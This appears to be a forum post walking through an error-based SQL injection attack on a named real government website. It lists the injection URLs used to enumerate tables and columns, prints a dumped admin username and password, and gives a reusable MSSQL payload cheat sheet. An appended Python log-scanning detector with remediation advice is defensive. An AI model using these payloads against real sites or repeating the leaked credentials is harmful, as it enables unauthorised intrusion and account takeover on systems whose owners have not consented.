Check for an error by appending '
The error displayed:
Unclosed quotation mark after the character string ''?
=> SQLi
Step 2: Query the table names
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -
The first table appears: 'Advert'
Conversion failed when converting the nvarchar value 'Advert' to data type int
Continue querying:
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Advert')))-- -
'Nick' appears:
Conversion failed when converting the nvarchar value 'Nick' to data type int.
Continue:
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Advert','Nick')))-- -
'Cate' appears:
Conversion failed when converting the nvarchar value 'Cate' to data type int.
Continue until the Users table appears; this is the table that holds the information needed.
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Advert','Nick','Cate','News','Site','CateManager','Users')))-- -
Step 3: Query the column names
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('Users') ))-- -
Continue the exploitation:
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('Users') and column_name not in ('ID','Email','PassWord','Active','own')))-- -
Step 4: Show the information wanted, here the email and password
Email:
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 Email from Users))-- -
adminduytien
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 PassWord from Users))-- -
duytien123
To show both values at once, use %2b'/'%2b (=> /)
http://www.duytien.gov.vn/?cat=170000 and 1=convert(int,(select top 1 Email%2b'/'%2bPassWord from Users))-- -
Step 5: Find the admin link and log in
Left to you :v
Conclusion: SQLi queries in ASPX to keep in mind
1- Get the version:
and 1=convert(int,@@version)-- -
Server Error in '/' Application.
Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64)
Jul 9 2008 14:17:44
Copyright (c) 1988-2008 Microsoft Corporation
Enterprise Edition (64-bit) on Windows NT 6.1 <X64> (Build 7601: Service Pack 1)
' to data type int.
2- Get Server Name
and 1=convert(int,@@servername)-- -
Conversion failed when converting the nvarchar value 'WIN-1VBUV10IB3G' to data type int.
3- Get data base name:
and 1=convert(int,db_name())-- -
Conversion failed when converting the nvarchar value 'duytien_data' to data type int.
4- Get system user
and 1=convert(int,system_user) -- -
Conversion failed when converting the nvarchar value 'duytien_user' to data type int.
5- Get the first table
and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -
6- Get the second table:
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("FIRST-TABLE-HERE")))-- -
7- Get the third table:
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("Second-Table-Here")))-- -
8- Keep going until the user table, to get the admin's login information
10- Get the first column from the table containing the admin:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")))-- -
11- Get the first column from the table containing the admin:
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE") and column_name not in ("FIRST-COLUMNS-HERE")))-- -
12- Repeat until all the columns holding the needed information are retrieved
13- Output the username and password
and 1=convert(int,(select top 1 column-name-1%2b'/'%2bcolumn-name-2 from TABLE-NAME-HERE))-- -
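Seen from the defender's side, every request in this write-up has the same shape in the web server log: a forced convert(int, ...) wrapped around a subquery, a metadata view or a server variable, usually answered with HTTP 500. The detector below is an added example, not part of the original post; the five-field log layout, the IP addresses and the paths are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Traits of the requests on this page: a forced convert(int, ...) around a
# subquery, a metadata view or a server variable, closed by a SQL comment.
RULES = {
    "cast_to_int": re.compile(r"\bconvert\s*\(\s*int\s*,", re.I),
    "subquery": re.compile(r"\(\s*select\b", re.I),
    "metadata": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "server_info": re.compile(
        r"@@(?:version|servername)|\bdb_name\s*\(|\bsystem_user\b", re.I),
    "trailing_comment": re.compile(r"--[\s-]*$"),
}
DATA_SOURCES = {"subquery", "metadata", "server_info"}

def score_query(raw_query):
    """Return the names of the rules matched by a still-encoded query string."""
    decoded = unquote_plus(unquote_plus(raw_query))  # tolerate double encoding
    return [name for name, rx in RULES.items() if rx.search(decoded)]

def is_error_based_probe(hits):
    """A forced int cast only matters when it wraps something worth leaking."""
    return "cast_to_int" in hits and bool(DATA_SOURCES & set(hits))

def scan(log_lines):
    """Return one alert per suspicious line of the simplified log format."""
    alerts = []
    for line in log_lines:
        parts = line.split()
        if len(parts) != 5:          # skip malformed or truncated lines
            continue
        ip, _method, stem, query, status = parts
        hits = score_query(query)
        if is_error_based_probe(hits):
            # A 500 reply suggests the conversion error reached the client.
            alerts.append({"ip": ip, "path": stem, "hits": hits,
                           "error_returned": status == "500"})
    return alerts

# Constructed sample lines: client-ip method uri-stem uri-query status
SAMPLE_LOG = [
    "203.0.113.7 GET /default.aspx cat=170000 200",
    "203.0.113.9 GET /default.aspx cat=170000%20and%201=convert(int,@@version)--%20- 500",
    "203.0.113.9 GET /default.aspx cat=170000+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables))--+- 500",
    "203.0.113.8 GET /search.aspx q=convert+int+to+string 200",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Detection is a backstop: binding the cat value as a typed parameter and turning off detailed error pages removes both the injection and the error channel these requests depend on.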
test comment :D